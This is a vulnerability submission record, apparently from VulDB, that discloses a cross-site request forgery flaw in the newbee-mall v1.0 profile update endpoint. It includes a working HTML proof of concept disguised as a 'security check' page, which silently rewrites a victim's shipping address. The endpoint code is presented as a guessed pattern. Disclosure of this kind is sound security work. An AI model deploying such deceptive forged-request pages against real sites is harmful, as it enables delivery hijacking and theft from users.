| tiêu đề | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Mô tả | # CSRF Vulnerability in Personal Information Update
## Summary
A **CSRF vulnerability** exists in the personal information update endpoint `/personal/updateInfo`. Attackers can modify users' personal information including shipping addresses, potentially redirecting deliveries to attacker-controlled locations.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/personal/updateInfo");
// ❌ Only authentication check, no CSRF protection
}
}
```
### Endpoint-Level Code Analysis
Based on project structure, the personal information update endpoint likely follows this pattern:
```java
@PostMapping("/personal/updateInfo")
@ResponseBody
public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
// ❌ No CSRF token validation
// ⚠️ Allows modification of sensitive user data including address
mallUser.setUserId(user.getUserId());
return mallUserService.updateUserInfo(mallUser);
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Can modify shipping address to attacker's location
3. ⚠️ Combined with order CSRF, enables complete delivery hijacking
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Profile Verification Required</title>
</head>
<body>
<h2>???? Security Check: Verify Your Information</h2>
<p>We're updating our security settings. Please verify your account...</p>
<script>
// Modify user's shipping address
fetch('http://localhost:28089/personal/updateInfo', {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
nickName: 'User',
introduceSign: 'Normal user',
address: '123 Attacker Street, Hacker City, 99999', // Attacker's address
// Other user fields remain unchanged
})
})
.then(response => response.json())
.then(data => {
document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>';
});
</script>
</body>
</html>
```
## Impact
**User information tampering and delivery hijacking** - Attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users.
---
**CVSS Score**: 7.3 (High)
|
|---|
| Nguồn | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/114 |
|---|
| Người dùng | flashzyc (UID 92850) |
|---|
| Đệ trình | 05/02/2026 11:59 (cách đây 4 các tháng) |
|---|
| Kiểm duyệt | 18/02/2026 07:56 (13 days later) |
|---|
| Trạng thái | Bản sao |
|---|
| Mục VulDB | 346456 [newbee-ltd newbee-mall đến a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Giả mạo yêu cầu liên trang] |
|---|
| điểm | 0 |
|---|